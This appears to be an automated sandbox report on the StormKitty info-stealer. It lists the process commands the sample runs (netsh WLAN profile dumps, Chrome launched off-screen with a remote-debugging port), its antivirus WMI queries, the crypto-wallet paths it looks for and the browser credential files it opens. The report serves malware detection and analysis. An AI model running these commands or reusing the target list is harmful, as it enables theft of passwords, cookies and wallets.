Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Queries volume information: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1083593548.0000000001563000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Generic Stealer

Source: Yara match	File source: 00000000.00000002.1094533087.000000000991C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q*C:\Users\user\AppData\Roaming\Exodus\
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q*C:\Users\user\AppData\Roaming\Exodus\
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q.C:\Users\user\AppData\Roaming\binance.txt0
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q:C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215d	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txt	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txt	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55d	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbf	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959a	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aef	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\events	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\parent.lock	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.ini	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\xulstore.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5d	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.bin	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5c	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5fa	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.json	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json	Jump to behavior
